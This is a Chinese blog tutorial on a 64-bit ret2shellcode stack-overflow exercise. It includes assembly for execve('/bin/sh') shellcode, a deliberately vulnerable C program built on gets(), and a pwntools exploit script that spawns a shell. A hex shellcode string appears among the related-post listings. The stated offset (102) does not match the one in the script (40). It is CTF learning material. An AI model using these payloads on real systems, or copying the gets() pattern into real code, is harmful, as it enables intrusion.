Rop-Ret2Shellcode-64位实例

最新推荐文章于 2024-01-24 17:14:26 发布
最新推荐文章于 2024-01-24 17:14:26 发布
阅读量836 收藏 4
点赞数
分类专栏: pwn学习 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanghuapyk/article/details/115012733
版权

Rop-Ret2Shellcode-64位实例

前面写过了32位的shellcode,这次继续64位shellcode,当我们的64位程序中没有system函数,并且开启了NX保护时,这时我们需要用到64位的shellcode来执行execve(“/bin/sh”,null,null);

如何编写shellcode呢?
①想办法调用execve("/binsh" , null, null);
②借助栈来传入字符串/bin/sh
③系统调用execve
rax = 0x3b(64bit)
rdi = bin_sh_addr(参数一)
rsi = 0(参数二)
rdx = 0(参数三)

xor rax, rax
add rax,0x3b
xor rdi, rdi
push rdi
movrdi,0×68732f2f6e69622f
push rdi
lea rdi,[rsp]
xor rsi,rsi
xor rdx,rdx
syscall

实例如下:

#include<stdio.h>
char buf2[200];
int main()
setvbuf(stdout,0,2,0);char buf[ 20];  //优化,一般不用管
printf( "what's your name: ");
gets (buf);
printf( "leave message: ");
gets (buf2);
puts(buf2);
return 0;
}

实例中,buf2字符串中有200个字节,我们可以将shellcode写入内存,然后第二次调用的时候,就能够执行我们的shelllcode函数,首先我们要看一下buf2段所处的位置,同时我们还要看一下这一个断中有没有执行权限。
开始调试 -------没开启任何的保护
在这里插入图片描述
Objdump –d –M intel ret2shellcode1 |grep buf2 搜索buf2字段。
在这里插入图片描述
Objdump –d –M intel ret2shellcode1查看反汇编
在这里插入图片描述
在buf2的代码处下断点 b *400671
在这里插入图片描述
断点下好后运行程序,最后断下来使用vmmap命令查看段信息
发现框起来的601000-602000之间的数据权限是可操作的,所以我们可以将shellcode代码写进去。
在这里插入图片描述
然后我们就开始计算偏移地址
Cyclic 500生成数据,重新运行程序,将数据传入第一个get函数中,第二个函数的输入随便输入,然后运行得到如下所示,这里的地址报错
在这里插入图片描述
然后使用cyclic –l 0x61626261计算偏移
计算出偏移为102
计算出偏移后,下面开始写exp

from pwn import *
context(arch = "amd64",os = "linux",log_level= "debug")
p = process("./ret2shellcode1")
e =ELF("./ret2shellcode1")
buf2 = e.symbols["buf2"]     “”“利用系统函数查找buf2地址“””
offset = 40
shellcode = asm(shellcraft.sh())  “”“”自动生成shellode“”
payload = offset*'a'+ p64(buf2)      “”“将buf2段的地址写入返回地址,然后程序会返回到buf2字段处”“”
p.recvuntil(":")             
p.sendline(payload)
payload2=shellcode.ljust(200,"a")
p.sendline(payload2)
p.interactive()
一点.
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
pwn刷题num35----ret2shellcode
tbsqigongzi的博客
04-29 305
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
ret2shellcode
weixin_56301399的博客
07-20 477
基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。
ret2shellcode 学习
akdelt的博客
01-24 522
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
PWN-ret2shellcode原理
m0_64180167的博客
04-17 545
我们之前做过很简单的pwn题目buuctf-rip这种 是在程序中存在shellcode 直接返回地址改为这个shellcode的地址即可但是如果程序里面没有呢这种类型就是ret2shellcode
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2085
pwn 入门
ROP之ret2alsolve(32位)详解
最新发布
06-18
ROP之ret2alsolve(32位)详解
Rop-Fast:快速跳动
06-25
2. **Rop框架扩展**:Rop-Fast在原Rop框架上进行了增强,修复了已知的bug,提高了框架的稳定性和可靠性。 3. **更好的性能**:针对性能进行了优化,使得处理请求和响应的速度更快,尤其适用于高并发场景。 4. **...
rop-plus:rop框架修改加强版
06-28
2. **数据执行保护(DEP)**:DEP防止非执行内存区域(如堆栈)被当作代码执行,但ROP通过利用返回指令(通常是`ret`)将控制权转移至栈上的gadget序列,从而绕过DEP。 3. **gadgets**:在ROP攻击中,gadgets是指...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
CTFHUB-PWN-ret2shellcode
m0_64180167的博客
04-16 899
几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text 【程序本身有先检查开了什么保护没有开保护 并且是64 的放入ida64查看字符串发现没有shell我们看看主函数发现有read函数 但是没有shell我们现在要确定一些信息。
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1657
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 515
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
ret2shellcode 的泄露puts@got表
wing_7的博客
10-08 1081
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现read@got.pltb保存了read函数的blic中的地址。call read—> read的plt表 —>read的got表。jmp到的其实这是plt表对应函数的got表。
linux x64 shellcode,栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 518
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
Linux 64位 shellcode
weixin_44442852的博客
10-20 1439
linux exec /bin/sh unsigned char code[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48" "\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f" "\x05"; int main(int argc, ch...
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例
网络安全知识分享
03-24 4172
ROP-Ret2Shellcode-64位实例 /usr/include/x86_64-linux-gnu/asm/unisted_64.h 编写64位shellcode,思路和32位是一样的 (1)想办法调用execve("/bin/sh",null,null) (2)借助栈来传入字符串/bin/sh (3)系统调用execve rax = 0x3b(64bit) rdi = bin_sh_addr rsi = 0 rdx = 0 实例代码如下: setvbuf函数的作用是优化io流,在服务器上时,或
linux64位shellcode代码注入
zyx4843的专栏
03-30 1785
【测试环境】  CentOS 5.4 (Final)x86_64  Linux version 2.6.18-164.el5. x86_64  GCC version 4.4.2 20080704 【汇编编译环境】  CentOS 7 x86_64  Linux 3.10.0-229.7.2.el7.x86_64  NASM 2.10.07 x86_64 【A程序:counter.
基于长序列的自动ROP漏洞利用提升程序安全
本文主要探讨了一种针对AR漏洞利用的新方法,即自动ROP漏洞利用(A-RExplot),该技术建立在长序列的基础上,旨在对抗程序安全领域的挑战。自ROP(Return-Oriented Programming)概念提出以来,由于其能够通过组合系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值